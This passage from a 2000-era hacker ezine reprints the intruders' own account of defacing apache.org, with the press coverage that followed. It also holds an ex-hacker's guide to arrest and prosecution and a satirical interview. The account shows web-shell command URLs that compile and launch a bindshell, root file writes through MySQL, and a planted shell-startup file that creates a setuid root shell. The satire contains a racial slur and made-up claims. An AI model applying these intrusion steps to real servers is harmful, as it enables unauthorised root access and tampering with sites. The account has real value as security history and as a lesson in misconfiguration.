"Manage auditing and security log" right. Check for failed logons in the Event Viewer. You can enable security auditing for logon attempts, file and object access, use of user rights, account manage- ment, security policy changes, restart and shutdown, and process tracking. Backup ------ Backup policies and procedures are essential. In your evaluation, determine which users belong to the Backup Operators group. Carefully evaluate if you trust these users. Backup operators have the ability to access all areas of the system to back up and restore files. Members of the Backup Operators group should have special logon accounts (not regular user a ccounts) on which you can set logon restrictions. If Joe is the backup operator, he should have a regular logon account for his personal activities and a special logon account for backing up the system. Set restrictions on the backup account, then set restrictions that force Joe to log on from a specific system only during appropriate hours. Change, with frequency, the name and password of the account to guard against hijacking. - Review the backup policies. Is the backup schedule appropriate? Are files safely transported to secure backup locations? How might backup compromise the confidentiality of files? - View the Event Log to audit backup activities. Final conclusion ---------------- Well, I hope that this articles gave You some basic info how to administrate Youre Windows NT server. For more info I recomend reading the following books: - Inside Windows NT Server 4 : Administrators Resource Edition This national bestseller has been updated and expanded to cover the most talked-about Windows NT-related technologies and the latest information on Windows NT Server 4. Aimed at network administrators, consultants, and IT professionals, this book provides invaluable information to help you get up and running. Written by experts, this comprehensive book takes you through the ins and outs of installing, managing, and supporting a Windows NT network - with efficiency. Loaded with tutorials and organized as a reference, it's the perfect resource for new administrators who need to get up to speed quickly, as well as technically savvy and experienced administrators who just need to locate the most essential information - without reading every page. - Essential Windows NT System Administration Essential Windows NT System Administration helps you manage Windows NT systems as productively as possible, making the task as pleasant and satisfying as can be. It combines practical experience with technical expertise, helping you to work smarter and more efficiently. It covers not only the standard utilities offered with the Windows NT operating system, but also those from the Resource Kit, as well as important commercial and free third-party tools. It also pays particular attention to developing your own tools by writing scripts in Perl and other languages to automate common tasks. This book covers the workstation and server versions of Windows NT 4 on both Intel and Alpha processor-based systems. - Microsoft Windows NT 4.0 Security, Audit, and Control This "Security Handbook" is the official guide to enterprise-level security on networks running Microsoft Windows NT Server 4.0 Written in collaboration between Microsoft and MIS professionals at Coopers & Lybrand, here is the essential reference for any Windows NT Server 4.0-based network. This is only a small amount of book concerning Windows NT security and administration. You can find more books on Windows NT at our online bookstore Default newsletter (http://default.net-security.org) @HWA 31.0 [IND] The apache.org hack. by {} and Hardbeat (Apr 4th 2000) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ How we defaced www.apache.org by {} and Hardbeat /* * Before you start reading */ This paper does _not_ uncover any new vulnerabilities. It points out common (and slightly less common) configuration errors, which even the people at apache.org made. This is a general warning. Learn from it. Fix your systems, so we won't have to :) /* * introduction */ This paper describes how, over the course of a week, we succeeded in getting root access to the machine running www.apache.org, and changed the main page to show a 'Powered by Microsoft BackOffice' logo instead of the default 'Powered by Apache' logo (the feather). No other changes were made, except to prevent other (possibly malicious) people getting in. Note that the problems described in this paper are not apache-related, these were all config errors (one of 'm straight from BugZilla's README, but the README had enough warnings so I don't blame the BugZilla developers). People running apache httpd do not need to start worrying because of anything uncovered herein. We hacked www.apache.org because there are a lot of servers running apache software and if www.apache.org got compromised, somebody could backdoor the apache server source and end up having lots of owned boxes. We just couldn't allow this to happen, we secured the main ftproot==wwwroot thing. While having owned root we just couldnt stand the urge to put that small logo on it. /* * ftproot == wwwroot * o+w dirs */ While searching for the laters apache httpserver to diff it the with previous version and read that diff file for any options of new buffer overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of the http://www.apache.org on that ftp including world writable directories. So we wrote a little wuh.php3 including and uploaded that to one of the world writable directories. /* * Our commands executed */ Unsurprisingly, 'id' got executed when called like http://www.apache.org/thatdir/wuh.php3?cmd=id Next was to upload some bindshell and compile it like calling http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c and then executing it like calling http://www.apache.org/thatdir/wuh.php3?cmd=./httpd /* * The shell */ Ofcourse we used a bindshell that first requires ppl to authenticate with a hardcoded password (: Now we telnet to port 65533 where we binded that shell and we have local nobody access, because cgi is running as user nobody. /* * The apache.org box */ What did we find on apache.org box: -o=rx /root -o=rx homedirs apache.org is a freebsd 3.4 box. We didn't wanted to use any buffer overflow or some lame exploit, goal was to reach root with only configuration faults. /* * Mysql */ After a long search we found out that mysql was running as user root and was reachable locally. Because apache.org was running bugzilla which requires a mysql account and has it username/password plaintext in the bugzilla source it was easy to get a username/passwd for the mysql database. We downloaded nportredird and have it set up to accept connections on port 23306 from our ips and redir them to localhost port 3306 so we could use our own mysql clients. /* * Full mysql access * use it to create files */ Having gained access to port 3306 coming from localhost, using the login 'bugs' (which had full access [as in "all Y's"]), our privs where elevated substantially. This was mostly due to sloppy reading of the BugZilla README which _does_ show a quick way to set things up (with all Y's) but also has lots of security warnings, including "don't run mysqld as root". Using 'SELECT ... INTO OUTFILE;' we were now able to create files anywhere, as root. These files were mode 666, and we could not overwrite anything. Still, this seemed useful. But what do you do with this ability? No use writing .rhosts files - no sane rshd will accept a world-writable .rhosts file. Besides, rshd wasn't running on this box. /* * our /root/.tcshrc */ Therefore, we decided to perform a trojan-like trick. We used database 'test' and created a one-column table with a 80char textfield. A couple of inserts and one select later, we had ourselves a /root/.tcshrc with contents similar to: #!/bin/sh cp /bin/sh /tmp/.rootsh chmod 4755 /tmp/.rootsh rm -f /root/.tcshrc /* * ROOT!! */ Quite trivial. Now the wait was for somebody to su -. Luckily, with 9 people legally having root, this didn't take long. The rest is trivial too - being root the deface was quickly done, but not until after a short report listing the vulnerabilities and quick fixes was build. Shortly after the deface, we sent this report to one of the admins. /* * Fix that ftproot==wwwroot */ Another thing we did before the deface, was creating a file 'ftproot' in the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist' and changing the ftproot to this new 'ftproot' dir, yielding the world-writable dirs unexploitable but allowing ftp URLs to continue working. /* * What could have been compromised? */ Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we wanted to, we could have done the same thing to Apache. Edit the source and have people download trojaned versions. Scary, eh? /* * In short: */ - ftproot==webroot, worldwritable dirs allowing us to upload and execute php3 scripts - mysqld running as root, with a FULL RIGHTS login without a password. /* * Compliments for the Apache admin team */ We would like to compliment the Apache admin team on their swift response when they found out about the deface, and also on their approach, even calling us 'white hats' (we were at the most 'grey hats' here, if you ask us). Regards, {} and Hardbeat. {} (mailto:karin@root66.nl.eu.org) is part of RooT66 - http://root66.nl.eu.org ShellOracle - http://www.shelloracle.cjb.net b0f - http://b0f.freebsd.lublin.pl Hardbeat (petervd@vuurwerk.nl) just has a lame page at http://www.dataloss.net/ In the media: ~~~~~~~~~~~~ Wired; http://www.wired.com/news/politics/0,1283,36170,00.html Apache Site Defaced by Michelle Finley 4:00 p.m. May. 5, 2000 PDT While the rest of the world battled the "Love Bug" worm, free Web-server software-provider Apache had problems of its own. Due to system-level misconfigurations of ftpd and bugzilla, a hacker was able to obtain a shell account and replace Apache's logo of a feather and its "Powered by Apache" tagline with a Microsoft logo and credit. "Yes, the www.apache.org site was penetrated," said Ken Coar, a director and vice president of the Apache Software Foundation. "The penetration was through some network services that were configured with an insufficient degree of paranoia. The penetration was not through the Apache Web server software nor any of the other Apache software, but through standard network utilities found on virtually all Internet servers." The people who penetrated the Apache.org system likely were "grey hats," Coar said. The hacker spectrum runs from "black hats," who would break in, do damage, and attempt to avoid tracing, to "white hats," who would note the configuration problems and let the site managers know about them without taking advantage of them. "These people fall into the 'grey area' in between because they told us about the problems, but not until after they had utilized them to make some apparently innocuous changes," he said. Cruciphux, publisher of the security and hacking electronic zine HWA.hax0r.news, ezine said the site was defaced around 6:37 p.m. EDT on May 3 by hackers known as "{}" and "Hardbeat." "{} belongs to Buffer Overflow Security, a fledgling security group consisting of ex-hackers and including people such as "mixter," who wrote TFN, the DDOS-distributed attack tool recently brought to light in the media by denial-of-service attacks on major websites," the ezine wrote. A mirror of the defaced site can be found on the Attrition.org mirror site and specific details of the break-in can be found on Apache's site. "They came right out and admitted what had happened and said they were at fault," said OpMan, a New York-based computer systems enthusiast, who noted that "you won't see Microsoft taking the blame for the ILOVEYOU debacle." "This was a classy hack," Cruciphux said. "It ended almost like a fairy tale. Although tracks were covered and logs cleared, it was decided to alert the apache.org people about the condition and a meeting between the intruders and Apache ensued. Not all defacings go this way, so kiddies remember: It is still very illegal and risky to do this. Be warned." The Register; http://www.theregister.co.uk/000506-000002.html Posted 06/05/2000 7:47pm by Thomas C. Greene in Washington Apache.org owned by white hats Friendly strangers briefly took over the Apache Software Foundation server by exploiting a series of common configuration errors, and then announced their presence by inserting an advertisement for Microsoft at the bottom of the home page. The open-source Apache is the most popular HTTP page server software currently in use. The intruders gained root access to Apache.org and could have done considerable damage, including replacing the Apache software offered for download with versions containing a Trojan which would have given them access to servers running all subsequent copies downloaded from the Apache.org Web site. In spite of the damage they could have done, they confined themselves to verifying their exploits, fixing one hole in Apache.org's server configuration, and leaving behind a harmless reminder. They also posted the full details of their exploits. The intruders originally gained easy access via FTP, discovered a plethora of world-writable directories (tsk, tsk), and installed a simple BIND shell which they could execute remotely via Telnet and from which they learned what services were running and the contents of most directories. Apache.org was running the BugZilla bug-tracking software, which requires a Mysql account. They found Mysql available locally and running as user root, though the BugZilla documentation warns against running Mysql as root. "We hacked www.apache.org because there are a lot of servers running apache software and if www.apache.org got compromised, somebody could backdoor the apache server source [code] and end up having lots of owned boxes," the intruders said. "We just couldn't allow this to happen, we secured the main ftproot==wwwroot thing. While having owned root we just couldn't stand the urge to put that small logo on it." The intruders, who go by the aliases {} and Hardbeat, showed a bit of purist pride. "We didn't wanted [sic] to use any buffer overflow or some lame exploit; [our] goal was to reach root with only configuration faults," they explained. Apache.org took the exploit in the spirit in which it was meant. "They seemed friendly. It would have been nice if they hadn't put the damned Microsoft logo up, but I guess they had to do something to get attention," Apache Software Foundation director Rasmus Lerdorf said in an interview with CNET. "We can only blame ourselves. It's quite embarrassing, but it's a good little heads-up," Lerdorf reportedly said. This has to qualify him as the kewlest corporate suit in the known universe. ® -=- C|Net; http://news.cnet.com/news/0-1003-200-1821155.html?tag=st.ne.1002.bgif.ni Apache site defaced in "embarrassing" hacker attack By Stephen Shankland Staff Writer, CNET News.com May 5, 2000, 12:45 p.m. PT Intruders defaced the main Web site of the Apache Web server project this week with a fake ad for a rival software package from Microsoft. A group of intruders broke into the server by exploiting a series of weaknesses, said Rasmus Lerdorf, a member of the Apache Software Foundation board of directors and a programmer at Linuxcare. The intruders limited themselves to inserting the Microsoft advertisement at the bottom of the page, though they could have done much worse damage because they had gained complete control over the computer, he said. Because of the comparatively mild damage and the fact that the intruders told Apache how their attack worked, Apache termed them "white hats"--helpful hackers, not the more malicious "black hat" category. "They seemed friendly," Lerdorf said. "It would have been nice if they hadn't put the damned Microsoft logo up, but I guess they had to do something to get attention." The burgeoning number of computers on the Internet is vastly increasing the opportunity for attackers looking for sites to break into. At the same time, those computers also are storing more important information, such as credit card numbers or corporate records. Apache is software used on a server to deliver Web pages to Internet browsers. It's the most commonly used Web server software, running on 60 percent of Web servers, according to a study by Netcraft. Microsoft's Internet Information Server is in second place with 21 percent. Apache, along with Linux, is among the best-known "open-source" programming projects, in which anyone may see, modify and redistribute the software's original programming instructions. Open-source projects typically are developed by a core group of volunteers, but corporations are increasingly involved as well. IBM and Sun Microsystems in particular have boosted Apache. The basic problem at Apache was that too many people could install whatever software they wanted on the server, leading to vulnerabilities that stemmed from the different pieces of software interacting, Lerdorf said. "We just had too many people installing too many services on the box without coordinating with each other," Lerdorf said. Apache now has shut down two vulnerabilities that led to the attack and has reduced the number of people who have control privileges, he said. In the longer term, Apache will be splitting jobs across several servers, a configuration that allows better security, Lerdorf said. In a note posted to the Bugtraq security mailing list today, the intruders described how they broke into the server. Lerdorf said the first stage was that members of the public could store software on the server after sending it with FTP software. The attackers used this feature to save a small program on the machine that later could be used to tell them what files were stored elsewhere on the system. The intruders then discovered the server had the Bugzilla bug-tracking software produced by Mozilla, the organization building America Online's Netscape Web browser. A weakness in Bugzilla allowed the attackers to gain complete control over the system, Lerdorf said. Apache shut down Bugzilla completely and will either fix it or replace it with other software, he said. Lerdorf put a good face on the defacement. "We can only blame ourselves," Lerdorf said. "It's quite embarrassing, but it's a good little heads-up." SlashDot; Posted by jimjag on Thursday May 04, @11:23AM from the strong-as-the-weakest-link dept. Yesterday, due to system-level misconfigurations, www.apache.org was defaced after a root-level breakin. Those responsible for finding the holes and the ASF have been in cordial contact, and the holes have been plugged. In the process of doing that, FTP and other services on www.apache.org have been stopped. A mirror of the defaced site can be found on the Attrition.org mirror site. Brian Behlendorf sent the following to various Apache mailing lists: Hi. We have been made aware (thanks to a very humorous banner ad for Microsoft Back Office on the front of www.apache.org!) that our particular configuration on www.apache.org of ftpd and bugzilla opened a security hole that allowed someone from the outside to get a shell account, and then get root. We have been in contact with those who found the hole, and have closed up the misconfigurations that allowed this. It is important to note that this is *not* a hole in the Apache web server or related software products. I would encourage double-checking the PGP signatures of Apache releases for the immediate future. However, I do not believe we are out of the woods yet. Bugzilla has not been thoroughly audited, and while I am not worried about ftpd, simply having another deamon that can write files to the web server whose purpose has been completely superceded by others suggests that taking it down for good is the right idea. So I am taking down FTP - something that should have been done long ago. If there are FTP links on any of our pages (or on places like freshmeat) they should be change to HTTP. There are enough high-quality text-mode HTTP clients that there is no point to having it up, save for mirroring, and we allow rsync and cvsup for that. I will be contacting the mirror site admins list to communicate this. Also, I have taken down all installations of bugzilla on apache.org until it can be audited. I will be performing a first pass tonight over it, but anyone else familiar with perl and willing to deal with rather ugly code is welcome to do so as well. I will set it back up once I'm comfortable there's been at least one reasonable pass over the whole codebase and any obvious holes have been plugged. This is only life-support though; I really don't think we should be using bugzilla once a suitable replacement is found. Finally, I think it can be said that this compromise was mostly due to a lack of discipline on the part of those who had root and set up services without considering the ramifications of the way they were installed. I don't want to point fingers, since I'm probably at least as to blame as others, but I do feel that the policy of giving root access to a larger number of people than usual was probably a mistake. Along those lines, I've changed the root password and removed everyone from group wheel but myself - sorry to be fascist about this but I kinda feel like at the end of the day it's my responsibility. We'll come up with a strategy soon about granting sudo access to particular people for particular binaries so that I don't become a bottleneck again. The details will soon be posted to bugtraq. Thanks. LinuxNews.com Pow-Wow With Apache's Hackers By Michelle Head Can you be scalped nicely? Apache seems to think being red in the face beats being red in the accounting department after an embarrassing encounter with some clever and well-meaning hackers. With the IT world still bobbing confusedly in the wake of the Microsoft Outlook love bug, the Open Source Internet Servicer, which currently runs over 60% of the Web sites on the Internet, was targeted by hackers Friday. The intruders, who declined to damage or disrupt the site, instead marked their trail with a modified Microsoft logo. Shortly afterwards, the hackers described their harmless heads-up in full detail on the Internet in a step-by-step tutorial, identifying themselves as Hardbeat and {}. The site describes how configuration errors allowed the two access to Apache--and how, instead of damaging the site, they simply posted an amusing warning and secured the site from other, less well-meaning prowlers on their way out. Asked if this hack was meant to protect a major Open Source project, Hardbeat responded, "We did this hack because we could. The possible risks mentioned in the paper (Trojanning Apache source) were really an afterthought. We did this because Apache.org is a high-profile site, and these configuration problems are common. Therefore, defacing Apache.org would be a great way to draw attention to these errors." {} described his background. "I am a coder, everything I write (like a Linux kernel security patch named auditfile) is Open Source," {} volunteered. "I work at a local monkey zoo and at a Cable ISP." {} intends to start formal training in computers next year. Hardbeat's background in Open Source is less extensive. "I have written one Open Source tool (http://www.dataloss.net/midentd). It's [available under the GNU (GNU's Not UNIX) General Public License (GPL)] but the next version will not be. It is also no longer maintained, because I am too busy. In daily life, I go to University (I am in my first year of Computer Science) and I have a job as a systems administrator/developer at a big hosting company in The Netherlands. I have no professional training," Hardbeat explained. "It's all experience." Hardbeat commented on the hackers' choice of a Microsoft logo for their marker. "Let's start by stating that that had no political meaning--we were looking for a subtle way to show we had that kind of access, without damaging anything or hindering people in their business at www.apache.org," he wrote. "We also figured that would draw a teensy little bit of extra attention," he continued, "and you asking this question shows that it does. :) Also note that this was not an official M$ logo," he added. "A friend of ours who works as a graphic designer did this thing for us." On whether Apache is their first (or last) mission, the happy hackers have no comment. "If we have anything to share we will, but privacy is a high good," Hardbeat explained. Hardbeat and {} hoped Apache would have "the only correct reaction to such a hack--to talk to the people who did it, and not sue them when they had no bad intentions." The pair hoped to educate Apache rather than upset them. "Talk to them, ask them what they did and especially how they did it," Hardbeat advised. "That way they will stay friendly to you and help you fix the problems in a quick and reliable way." "Apache reacted above these hopes, being friendly and responsive, complimenting us `you guys are clever!', `Good work, guys'" Hardbeat reported. Apparently Apache's director was grateful for the warning. "They seemed friendly. It would have been nice if they hadn't put the damned Microsoft logo up, but I guess they had to do something to get attention," Apache Software Foundation director Rasmus Lerdorf said in an interview with CNET. "We can only blame ourselves. "It's quite embarrassing, but it's a good little heads-up," About the Author: Michelle Head is an experienced author who decided to plunge into the world of Linux journalism. Michelle is a new Linux enthusiast and is excited about the Linux community. She welcomes feedback on her articles and would love to hear ideas for future articles. She can be reached at Michellh@LinuxMall.com. @HWA 32.0 [IND] The Goat Files: mindphasr talks more about his bust. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (selected files from www.goat-security.org) http://www.goat-advisory.org/texts/goat-gH-busted.txt "Everything a hacker needs to know about getting busted" part 2 by mindphasr (gH) ***note: Although g0at security mocks gH quite a bit, we still have some what good relations with the busted mindphasr. I asked mindphasr to write something like this for goat-advisory.org, instead it is being released under gH, we do however have exclusive distro rights to this, thus the reason why it is up here.... ..::gH Release 040900:.. ..::mindphasr@attrition.org:.. * Converted from a scratch pad into a .txt file by John Welder a.k.a. "Ansle" "EVERYTHING A HACKER NEEDS TO KNOW TO ABOUT GETTING BUSTED PART 2" :PREFACE: A. INTRODUCTION B. THE RAID C. CHARGES D. GETTING A DEFENSE E. INDICTMENT F. PLEA AGREEMENTS G. HEADING TO COURT H. YOUR FUTURE I. THE END :PREFACE: This file is being written for the sole purpose to be informative. I take no responsibility for anything that is done with this file in mind. This file may be freely copied to a bulletin board systems, text archives or print material. All I ask is proper credits are given to the author(s). - mindphasr / April 5th 2000 A. INTRODUCTION Now days, after very popular movies such as "Hackers" and "The Matrix" the hacker world has much been glamorized as something most people will see as something very interesting. However, what is not shown is the real consequences of what could happen in the end. There have been so-called hacker groups popping up all over, many of which last about as long as a 10 dollar bill laying on the road. In the past 5 years I have gone through many things in the scene. I have seen people trusted by the community turn into FBI informants, I have seen looked up to people in the scene turn into FBI informants, I have also seen best friends turn their backs. This is all part of the so-called hacker world. Many individuals these days will do anything they can to gain respect in the scene, however many are unaware what may come of this. I have been through one of the most highly publicized hacker incidents in the last decade, and unfortunately have also gone through the court battles. The battles I hope this document will help most get through. However, this document will be focused primarily on the legal issues involved and what to and to not do. I write this with much respect for Agent Steal's 1997 file "Everything a hacker needs to know about getting busted". I am going to go over some things that have not been covered in his file. It is an excellent file, read it, read it many times. You may obtain his text file at http://www.attrition.org/~modify/texts/scene/everything.busted.html . Enjoy. B. THE RAID This is probably when it will hit home for most of you. You may suddenly realize what you have done is not so harmless. You will most likely be awakened from a sleep between 6am-9am. You will get to hear the infamous FBI knock. They knock louder than anyone you have ever heard, you will know its them. If you do not open the door within a minute or so they will not hesitate to open the door themselves. If you are in an apartment complex, they will have a key. If you are at your home, they will have a bigger key that will knock your door down. It will usually be a few FBI agents and then local law enforcement 'assisting'. They don't care if you're a 9 year old or a 40 year old. They do it all the same. When they come in they will find you and grab you and drag you somewhere safe where they can search you. In most cases that will be outside your apartment or house. They will have their guns drawn, so doing something stupid at this point would not be bright at all. They will then handcuff you and bring you back inside and set you down on a couch or a nice chair. Get comfortable you may be sitting there awhile. An agent will then proceed to tell you they are going to search you place, make sure you ask for the search warrant. A key to look for here is who the warrant is written out to. In most cases your local police will NOT have a warrant issued to them, do not let them go through your stuff. Leave it to the FBI. There is actually a good reason for this, the FBI will not and cannot issue citations for drugs, underage drinking, etc. If the police see it they will write you up. You don't need that. They like to get sneaky and try to get you to agree and make you think they have one. They will NOT always have one. After you overlook the warrant, they will then proceed to tear your place apart. They will search everything, I mean everything. In fire alarms, behind posters, in attic, under rugs, in refrigerator, in tape decks, in your garbage. While the agents are executing the search one designated agent will be there to try and get you to talk to them. You have heard it before and you will hear it again many times: DO NOT SPEAK WITH ANY OF THEM, KEEP YOUR MOUTH SHUT! NOTHING YOU SAY WILL DO YOU ANY GOOD. When you decide not to speak with them chances are they will get a little testy. That's their problem. I suggest you do not say a single world while they are there other than "May I see the warrant?" You don't have to; it's your right to remain silent. In most cases they will not arrest you. They will leave. They will also try and say bye to you and get you to call them back. This is a controversial situation, some people say call them back and try to cooperate. However, in my experiences it gets you nowhere. So don't bother. Before they leave, make sure you get a copy of the search warrant and the "Search & Seizure" form. That form will allow you to get your things back. If it is not written down on there, you will not receive them back. Check it over before they leave. C. CHARGES In most cases after the raid you will not hear from the FBI for quite some time. Some cases, never again. They tend to take their time. Charges will follow. They will be back to execute yet another search warrant, however most cases this will have to be a voluntary execution. They will most likely be back with a list of charges being brought forward. They will then ask you if they can execute a search warrant. If you say no they will say a cocky line such as "Oh, that doesn't matter we can get one within 1 hour, and we will let the judge know you're not cooperating." This is the point where you may want to cooperate somewhat. They can keep you in custody. They will arrest you and bring you in front of the nearest Magistrate (which is a fancy term of a off dutiy judge). He will then decide whether you should be kept in custody or not. In my case, I was brought downtown to the courthouse and put in a real nice office and put on a teleconference with a Magistrate and he discussed with the FBI agents if I should be kept in custody or not, and if not what my conditions of release should be. This is where the agents may say you are not cooperating. I was release on a signature bond and restricted from coming within 10 feet of a computer. D. GETTING A DEFENSE Depending on your case, you are going to have to decide what kind of lawyer to get. In federal cases there really is no such thing as "Public Defender". What they do is put together a bunch of lawyers who would like to work federal cases to extend their resumes. They then pick from a "hat" to come up with a lawyer to represent you. In my case, I was hooked up with a very very nice lawyer. So therefore I did not have to go out and spend my life savings on legal fees. However, you could get the so-called shaft and get a sucky PD wannabe. In this case you are going to want to go searching for a lawyer who has experience in this sort of law. Those kinds are becoming easier and easier to find these days. Depending on your wallet you are going to want to find one you can afford and yet still be able to eat afterwards. E. INDICTMENT This is sort of a downtime. You must wait for the Grand Jury to come back with an indictment on your charges. This will happen 99% of the time. This is when the charges are official. Most indictments will have extra charges tacked on that the government themselves know they cannot prove. These will be used for "Plea Bargain" situations. Such as "You plea to count 1 and 3, we will drop 2 and 4" You get the idea. F. EVIDENCE Be prepared, you are going to be surprised at what the government has on you, and your 'conspirators.' You are going to want to file a "Motion for Discovery" which will require the government to hand over all their "discovery" materials. This will include photocopies of paperwork obtained at their raids, stuff from others. Statements made by others against you. And of course hardware. You get the point. The government will go over this very closely and pick apart everything. They like to link everything together, even if its not called for. They will do it. They will most likely go through your drives and link together things to make you look like a monster. They will also pin you down as part of a conspiracy if you are involved with more than one person, such as in my case. If you are lucky they won't file addition conspiracy charges. G. HEADING TO COURT Once the indictment is presented, and then you have to make some very important decisions. These could affect your future. First off, are you clearly guilty of the items and can they be proven? If so, common sense tells you not to spend your life fortune to hire a lawyer who will lie for you. In most computer cases there is substantial evidence that is rather blatant. Such as phone logs that will shoe exactly what you did. If you believe you are being targeted for things that cannot be proven. Go ahead fight it. In most cases the government will try to tack on a few extra charges, which are rather irrelevant and they know cannot be proven. However, these are used for plea bargain situations. I will discuss that a bit more in the next section. So far, in this file I have taken a much better look at Federal crimes. Since unfortunately that is all I have personal experience in. In federal cases all court dates will be one of the Federal Courthouses. You most likely will have to drive a ways to get to it. Each state has at least two federal courthouses. This will vary depending on where you are. F. PLEA AGREEMENTS They will be offered. Sometimes they will be bad, sometimes they will be good. Do NOT take the first one presented to you. This is usually an agreement, which lets the government know how guilty you really think you are. They will offer more than one. If you have a good lawyer he will be in contact with the US Attorney and will try to work something more practical out. It happens in most cases. This is a very important thing to think about. If do not accept a plea agreement, then you can risk your case in court. However if you loose, you may be wishing you had accepted an agreement. You can't go back and accept it later. Think about this, think about this long and hard. If you decide to accept one, make sure you read the WHOLE agreement over, several times. They like to hide things in there. Be careful of what you sign. G. SENTENCING Let's skip ahead here. Lets say you are found guilty of something. Then the next phase is sentencing. This can be a wreck to most people and their families. Sentencings in federal cases go by the United States Sentencing Guidelines aka U.S.S.G. It is a point scale. They will take your criminal history, your cooperation, the damage caused, i.e. and add points up and minus points off. They will come up with a number. This number will decide the sentencing range. In my case there was quite a problem with this. My lawyers added up a number of 8. The government had a number of 9. Because of the disagreement on damage caused. The 1-point difference was about 5 months different in imprisonment. The judge has the discression to not use the point system. However, my case was sort of a precedent being set. If the point were 8, I would have gotten 0-6 months. However, the minimum sentence in the code for the sub Section 1030 crime was 6 months. So that caused a problem. Could the judge go less than 6? He clearly could according to the U.S.S.G. but not according to the law. He elected to rule out the points, and go with the book. I was given 6 months. The very minimum. Even though the government was looking for 28 months :) The judge may also decide where to put you. In my case I was sentenced to a Federal Half-Way house. I was lucky, there was room and I did not have to spend anytime in a Federal Prison. I have not been to the halfway house yet however, so I will leave information on that to be put in a revision down the road. H. YOUR FUTURE Now, after your sting in the Federal holding center. You will most likely be not allowed to speak with any of your ex-friends. Not use a computer. Let all employers know of your past. Be on probation. Not be allowed to profit from your story. All these things come as part of your sentence. You will have to report to a probation office, be drug tested. Have to contact her of any police contacts, if you are leaving your district. It will not be fun. I got the maximum probation, which is 3 years for my case. I will deal with it. If I can I'm sure you can :) I. THE END Well, I hope this was a help to you. This along with Agent Steals text I am sure you can get a very good understanding of the whole situation. I am not here to tell what to and not to do. Remember, I have gone through it. I know how it is. If you are going to do these activities please remember these things. As long as you talk to the right people (Stay away from John Vransevich @ AntiOnline, Carolyn Meinel @ HappyHacker) and be very careful when you do things. Slipping up once, may make these text files reality. I admire and respect the following people and organizations very much for their friendship and help over the past 5 years, you have been a big part of my life whether you know it or not: Organizations: Global Hell(gH), cha0s inc., Cult of the Dead Cow, h4gis, l0pht, Attrition, Hacker News Network, Pure Security Networks, Help Net Security, 100% Bikkel(RIP), Defcon, Rootfest, 2600-gb2600, FinalDream inc., Individuals: MostHateD, altomo, Zyklon, Taylor, shekk, Debris, ech0, Jericho, McIntyre, flesh, obsolete, LoopHole, aeonflux, SoulBlaze, Rewn, Kuruption, Cryzydopey, diesl0w, socked, spacerog, Agent Steal, Kevin Mitnick, Ted Bridis, Brock Meeks. @HWA 33.0 [IND] The Goat Files: "Hackers unite - a goat security expose" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (selected files from www.goat-security.org) 04/24/00 /////////////////////////////////////////// GGGGGG OOOOOOO AAAAAAAA TTTTTTTTTT G O O A A TT G GGG O O AAAAAAAA TT G G O O A A TT GGGGGG OOOOOOO A A TT \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ [g0at] http://www.goat-advisory.org [g0at] -=g0at media productions=- ((Hackers unite))-((A goat security expose)) In a most terrifying move by the biggest names in the underground community, representatives of Global Hell (gH), the Shot Down Crew (sDc) and the Brotherhood of Warez (BoW) have announced a merger making them the biggest and more powerful hacker group the Eris Free net's IRC network has ever seen. g0at security [http://www.goat-advisory.org] has taken upon itself the mission of getting to the bottom of this alarming event and discovering the reasoning behind it. Recently, a member of g0at security visited Global Hell leader, Patrick Gregory (aka Mosthated) in his new home, a United States federal penitentiary where he is serving 5 years. Upon entering the prison library, where we were to interview Gregory, we found him sitting on the lap of another inmate tapping away at the keyboard of the prison computer. When asked what he was working on, Gregory replied saying that he had recently reformatted the computer and installed the latest version of Linux Mandrake as opposed to Microsoft Windows 95 since microsoft products are lame. He then went on to tell us that to occupy time in prison, he has downloaded Microsoft Visual Basic 6 and has been running it with the latest version of Wine in the KDE environment. A full interview follows. GS - g0at security MH - Patrick Gregory GS: Can you confirm a merger between Global Hell and other well known underground groups? MH: Yes, Global Hell is merging with two other group. GS: What groups are these? MH: The Shot Down Crew and the Brotherhood of Warez. GS: What is the reasoning behind this merger? MH: Well as you may know, since the FBI investigation commenced in the Summer of 1999, gH has slowly been dying out. Many of our members have taken off in fear of being raided, some were arrested, and gH's two leaders are now serving time. We have lost our stronghold on the internet and we must regain this in order to show the public stability in our organization. GS: Why is stability in Global Hell required for the general public to see? MH: The gH ran security site (http://www.pure-security.net) has been growing gradually over the past half year and we need to raise some capital in order to increase our expansion. Pure Security Networks, is announcing that it has filed to go public (IPO) in May of 2000. GS: An IPO? Please expand on this... MH: Well, May 23 2000, Pure Security Networks under the symbol of PSN, will be trading on the Nikkei 225. Common shares will start a $0.32, no preffered shares are being offered. GS: During this expansion of Pure Security Networks, what new services will be offered? MH: Well we have negotiated a contract with the government of Zaire to offer internet connectivity to local schools. Also we plan on beginning mutual fund and retirement consultations along with helping script kiddies create investment portfolios. g0at security then went on to get the Smack Down Crew's side of the story. g0at security found members of the group on the James Joyce appreciation BBS located in Dublin, Ireland. When asked about the merger and various questions related to the IPO, sDc representatives respond with the same uniform answer, "Whachoo talkin bout foo". They then went on ranting about how they own goats. They ended the interview with a very befuddled quote. "Dem goats better rememba somethin foo, mess with the best, die like the rest". We were then expelled and banished for life from using the James Joyce appreciation BBS. Finally, g0at security went on to get the story from the Brotherhood of Warez. g0at security met with a member of the group, sw_r on a popular IRC channel, #solace on efnet which appeared to have been taken over by some goats. When asked about the reasoning behind the merger and IPO, he went on to quote us this: "Back in the day, I was a member of the MOST elite hacker group ever, the Masters of Deception. MOD was so much more elite then LOD. FUCK the LOD, they should all rot in hell. God I hate Eric Bloodaxe, that neegro is going to get it. Friggin hick, show them texas boys what I'm made of. Anyways, a book was written about the MOD and how we kicked the LOD's asses! Those stupid authors (Michele Slatalla and Joshua Quittner) didn't include me in their friggin book! They should DIE! I own them. I own them all. So with this IPO, I hope to buy out the Harperperennial Library and ruin those damned authors carriers. I'll show them who the elite one is. Not that twirp PhiberOptik, I own his ass. I'll school him in DNS anyday". g0at representatives then proceeded to back away 